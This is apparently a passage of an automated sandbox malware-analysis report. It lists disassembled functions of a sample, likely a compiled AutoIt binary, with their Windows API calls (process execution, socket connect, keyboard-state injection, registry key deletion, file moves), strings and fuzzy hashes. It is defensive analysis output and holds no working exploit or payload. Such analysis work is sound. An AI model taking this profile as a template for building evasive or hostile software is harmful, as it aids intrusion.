Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: c2eabd5d60503d177bf46cd909eff61ace597197c6e2524952ee3768389b596c
Instruction ID: da381e6136a8e56b85e1b80953db55ff9ecce80afe824c4558ab965e78e58da0
Opcode Fuzzy Hash: c2eabd5d60503d177bf46cd909eff61ace597197c6e2524952ee3768389b596c
Instruction Fuzzy Hash: 0211573534878AFEE7189F18DC46C6B7B9CDF16320B20412AFE00A6282EB7D5F4146A5

Function 007A42F8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 007A4312
LoadStringW.USER32(00000000), ref: 007A4319
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 007A432F
LoadStringW.USER32(00000000), ref: 007A4336
_wprintf.LIBCMT ref: 007A435C
MessageBoxW.USER32(00000000,?,?,00011010), ref: 007A437A

Strings

%s (%d) : ==> %s: %s %s, xrefs: 007A4357

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wprintf
String ID: %s (%d) : ==> %s: %s %s
API String ID: 3648134473-3128320259
Opcode ID: e5d2a4db652b43caa9f5b18669f6829920eb2ba71958419aae06848743acc74f
Instruction ID: ca7075eacda4e8d9142051513fbac1f155f674f028957053a29911e2080c2982
Opcode Fuzzy Hash: e5d2a4db652b43caa9f5b18669f6829920eb2ba71958419aae06848743acc74f
Instruction Fuzzy Hash: F90162F290020CBFEB5197A0DD89EF7776CEB08301F0045A9FB45E2051EA795E854B79

Function 00742A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0077C1C7,00000004,00000000,00000000,00000000), ref: 00742ACF
ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0077C1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00742B17
ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0077C1C7,00000004,00000000,00000000,00000000), ref: 0077C21A
ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0077C1C7,00000004,00000000,00000000,00000000), ref: 0077C286

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 2570504cc6b780e678ad326af86d1572eb172c5ea43df94b2b68c3f360e5b744
Instruction ID: e94965618b4e32a6ab4d86e6305e2ac4b0331fcd4abdb248860f1872c59ca763
Opcode Fuzzy Hash: 2570504cc6b780e678ad326af86d1572eb172c5ea43df94b2b68c3f360e5b744
Instruction Fuzzy Hash: E041D630704780AADB368B288C8CB6B7B96BB49310FA4C81DFD4B96563C77D9857D721

Function 007A70C6 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 007A70DD

Part of subcall function 00760DB6: std::exception::exception.LIBCMT ref: 00760DEC
Part of subcall function 00760DB6: __CxxThrowException@8.LIBCMT ref: 00760E01

ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 007A7114
RtlEnterCriticalSection.NTDLL(?), ref: 007A7130
_memmove.LIBCMT ref: 007A717E
_memmove.LIBCMT ref: 007A719B
RtlLeaveCriticalSection.NTDLL(?), ref: 007A71AA
ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 007A71BF
InterlockedExchange.KERNEL32(?,000001F6), ref: 007A71DE

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
String ID:
API String ID: 256516436-0
Opcode ID: 10cf525ec226b3a83a7fe843311142a4ac57a42072be8ff5695dc08fe45f1230
Instruction ID: 7aeed1d87a532cd94621de25ce72f07fd8f25714f7394405baea30222db8eb7e
Opcode Fuzzy Hash: 10cf525ec226b3a83a7fe843311142a4ac57a42072be8ff5695dc08fe45f1230
Instruction Fuzzy Hash: B2315071A00205EBCB00EFA4DC89EAF77B9FF85710F1481A9ED049B256D7389A14DBA4

Function 00741424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0015df53e3777e9bbcc8eb47a1418ea0536e051c152e323b7d22a5cb63723996
Instruction ID: 742ee97ba837f169c645dd11e2d18a0b86ef2ef42a77c153815b7f14eab50494
Opcode Fuzzy Hash: 0015df53e3777e9bbcc8eb47a1418ea0536e051c152e323b7d22a5cb63723996
Instruction Fuzzy Hash: 66716C30900109EFCB04DF98CC89EBEBB79FF85354F54C159F915AA251C738AA91CBA4

Function 007BF41E Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 007BF448
_memset.LIBCMT ref: 007BF511
ShellExecuteExW.SHELL32(?), ref: 007BF556

Part of subcall function 00749837: __itow.LIBCMT ref: 00749862
Part of subcall function 00749837: __swprintf.LIBCMT ref: 007498AC

Part of subcall function 0075FC86: _wcscpy.LIBCMT ref: 0075FCA9

GetProcessId.KERNEL32(00000000), ref: 007BF5CD
CloseHandle.KERNEL32(00000000), ref: 007BF5FC

Strings

@, xrefs: 007BF525

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
String ID: @
API String ID: 3522835683-2766056989
Opcode ID: 3ec44059db3877103cde15d16bddad39dabf59f9d292a2c9d3a944befd38d195
Instruction ID: cf72b32ec96558d5fa418fffd07820612af1605d67cc7c438772787e2c6ea140
Opcode Fuzzy Hash: 3ec44059db3877103cde15d16bddad39dabf59f9d292a2c9d3a944befd38d195
Instruction Fuzzy Hash: 5B619175A00619DFCF14DF68C885AAEBBF5FF48710F148069E856AB351CB39AD41CB90

Function 007A0F4D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 007A0F8C
GetKeyboardState.USER32(?), ref: 007A0FA1
SetKeyboardState.USER32(?), ref: 007A1002
PostMessageW.USER32(?,00000101,00000010,?), ref: 007A1030
PostMessageW.USER32(?,00000101,00000011,?), ref: 007A104F
PostMessageW.USER32(?,00000101,00000012,?), ref: 007A1095
PostMessageW.USER32(?,00000101,0000005B,?), ref: 007A10B8

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: f11b0a7cef37031e536c5e79d097f2975e8d5c33f7708e2a47df86fc0875ee11
Instruction ID: 1446db2c74a1bdd777ee854091b4b563996f01d2d7a62f24c93359393ebb4e95
Opcode Fuzzy Hash: f11b0a7cef37031e536c5e79d097f2975e8d5c33f7708e2a47df86fc0875ee11
Instruction Fuzzy Hash: 0251E2A06047D57DFB364234CC19BBBBFA96B87304F488A89E1D4968C2C29DECD8D751

Function 007A0D66 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 007A0DA5
GetKeyboardState.USER32(?), ref: 007A0DBA
SetKeyboardState.USER32(?), ref: 007A0E1B
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 007A0E47
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 007A0E64
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 007A0EA8
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 007A0EC9

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 8de0cf3cdd514234a57482334db403233e4aac302a05b3a31d20b58a7659f2e0
Instruction ID: 402f230349ca516966cd0b9f7ca0b8efa55d65d60ac0890fcc6cbc3f3ac3cb7d
Opcode Fuzzy Hash: 8de0cf3cdd514234a57482334db403233e4aac302a05b3a31d20b58a7659f2e0
Instruction Fuzzy Hash: 8B5105A16087D57DFB3693348C45B7A7FA96B87300F088E89F1D4568C2C399EC98E790

Function 007A55FD Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 007A560A
_wcsncpy.LIBCMT ref: 007A563F
_wcsncpy.LIBCMT ref: 007A5671
_wcsncpy.LIBCMT ref: 007A56A4
_wcsncpy.LIBCMT ref: 007A56E6
_wcsncpy.LIBCMT ref: 007A5720
_wcsncpy.LIBCMT ref: 007A574F

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: _wcsncpy$LocalTime
String ID:
API String ID: 2945705084-0
Opcode ID: 82d7568c021c4268bad4f70f0aa87494f6f62c6726a7058d98f3f770431691a8
Instruction ID: 513568396434338af09deae77dbacc46f1386118178b968a6e5656d779673523
Opcode Fuzzy Hash: 82d7568c021c4268bad4f70f0aa87494f6f62c6726a7058d98f3f770431691a8
Instruction Fuzzy Hash: D441A965C10614B6CB11EBB48C8AACFB3B8DF45310F508556E91AE3162FB38E355C7A6

Function 007CA056 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 130COMMON

Download Yara Rule

Strings

@U=u, xrefs: 007CA14F

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID:
String ID: @U=u
API String ID: 0-2594219639
Opcode ID: d2760d997ac0a3989198c29b1b0cba4d77d0e6232ec53cbbfa6a258266089450
Instruction ID: 6a700cd9bf7918c931db27f9843166142e308cb7ea09df323a0cc1437638ce34
Opcode Fuzzy Hash: d2760d997ac0a3989198c29b1b0cba4d77d0e6232ec53cbbfa6a258266089450
Instruction Fuzzy Hash: 2441E43590410CBFD710DF28CC48FAABBB5EB09356F18416DF915A72E0DB389D41DA51

Function 007A3671 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 007A466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,007A3697,?), ref: 007A468B

Part of subcall function 007A466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,007A3697,?), ref: 007A46A4

lstrcmpiW.KERNEL32(?,?), ref: 007A36B7
_wcscmp.LIBCMT ref: 007A36D3
MoveFileW.KERNEL32(?,?), ref: 007A36EB
_wcscat.LIBCMT ref: 007A3733
SHFileOperationW.SHELL32(?), ref: 007A379F

Strings

\*.*, xrefs: 007A372D

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
String ID: \*.*
API String ID: 1377345388-1173974218
Opcode ID: 15d1cbf5976c128f1259793c98219b3b9f41e5a162b85a6d5186744accdac822
Instruction ID: 7e60952ede92b959a36097751459a89069b0d0f8fedae8d91381172de930e6e2
Opcode Fuzzy Hash: 15d1cbf5976c128f1259793c98219b3b9f41e5a162b85a6d5186744accdac822
Instruction Fuzzy Hash: A241AFB2508344AAC755EF64C4459DFB7E8AFCA380F000A2EF49AC3251EB38D289C752

Function 007C7291 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 007C72AA
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007C7351
IsMenu.USER32(?), ref: 007C7369
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 007C73B1
DrawMenuBar.USER32 ref: 007C73C4

Strings

0, xrefs: 007C729E

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert_memset
String ID: 0
API String ID: 3866635326-4108050209
Opcode ID: bbaf70213fccf646073e63b27be1745c2fbfd62fb216b153627fb3629b416625
Instruction ID: 4ae90bc064ffa88e0981d3163bf6c130bdb96eb291f62a3557f34b00f230dd30
Opcode Fuzzy Hash: bbaf70213fccf646073e63b27be1745c2fbfd62fb216b153627fb3629b416625
Instruction Fuzzy Hash: EF411675A04288EFDB24DF50D884E9ABBB9FB04350F14852DFD559B290DB34AD50DF60

Function 007C0FA5 Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 007C0FD4
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 007C0FFE
FreeLibrary.KERNEL32(00000000), ref: 007C10B5

Part of subcall function 007C0FA5: RegCloseKey.ADVAPI32(?), ref: 007C101B
Part of subcall function 007C0FA5: FreeLibrary.KERNEL32(?), ref: 007C106D
Part of subcall function 007C0FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 007C1090

RegDeleteKeyW.ADVAPI32(?,?), ref: 007C1058

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: EnumFreeLibrary$CloseDeleteOpen
String ID:
API String ID: 395352322-0
Opcode ID: 9bef9d696aff4f88f3a7335a628ea6c32030d96df4c45501df1cd7f2d3aff6dc
Instruction ID: 7d983237f82023e79caed76a627b97af5cf2d74532c2eb2f97078978443043c4
Opcode Fuzzy Hash: 9bef9d696aff4f88f3a7335a628ea6c32030d96df4c45501df1cd7f2d3aff6dc
Instruction Fuzzy Hash: 3231F971901109FFEB15DB90DC89EFEB7BDEF09300F40417EE911A2151EA789EC99AA4

Function 007B6173 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON

Download Yara Rule

APIs

Part of subcall function 007B7D8B: inet_addr.WS2_32(00000000), ref: 007B7DB6

socket.WS2_32(00000002,00000001,00000006), ref: 007B61C6
WSAGetLastError.WS2_32(00000000), ref: 007B61D5
ioctlsocket.WS2_32(00000000,8004667E,00000000), ref: 007B620E
connect.WSOCK32(00000000,?,00000010), ref: 007B6217
WSAGetLastError.WS2_32 ref: 007B6221
closesocket.WS2_32(00000000), ref: 007B624A
ioctlsocket.WS2_32(00000000,8004667E,00000000), ref: 007B6263

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
String ID:
API String ID: 910771015-0
Opcode ID: 5af183ea58ade1ed65fdc76538fb63bd34d7fee42034a944e28d49e44352b7ec
Instruction ID: 018932284c5ac7fe133e38d71f737afa1e6204b264bbcf692c6f8b98923ea5cf
Opcode Fuzzy Hash: 5af183ea58ade1ed65fdc76538fb63bd34d7fee42034a944e28d49e44352b7ec
Instruction Fuzzy Hash: A6317071600118ABEF10AF64CC89FFE77ADEB45760F048069FA05A7291DB7CAD048AA1

Function 00798E90 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 94windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00747DE1: _memmove.LIBCMT ref: 00747E22

Part of subcall function 0079AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0079AABC

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00798F14
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00798F27
SendMessageW.USER32(?,00000189,?,00000000), ref: 00798F57

Part of subcall function 00747BCC: _memmove.LIBCMT ref: 00747C06

Strings

@U=u, xrefs: 00798F14, 00798F27, 00798F57
ComboBox, xrefs: 00798E9E
ListBox, xrefs: 00798ED3

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: MessageSend$_memmove$ClassName
String ID: @U=u$ComboBox$ListBox
API String ID: 365058703-2258501812
Opcode ID: 65d48b32852c3104b2cbe271bf50f1d69f8f0bd55deecb9bae2041e02661c85e
Instruction ID: 88b848d35b7ea542932dd222ca430928316712819567d52f01711a78f1b3e6bc
Opcode Fuzzy Hash: 65d48b32852c3104b2cbe271bf50f1d69f8f0bd55deecb9bae2041e02661c85e
Instruction Fuzzy Hash: 5A21C171A04104FEDF18ABA09C49DFFB76ADF46360F148519F825A72E1DB3D5809D650

Function 0079F65E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 0079F671
__wcsnicmp.LIBCMT ref: 0079F692
__wcsnicmp.LIBCMT ref: 0079F6AC

Strings

#requireadmin, xrefs: 0079F68C
#notrayicon, xrefs: 0079F669
#OnAutoItStartRegister, xrefs: 0079F6A6

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
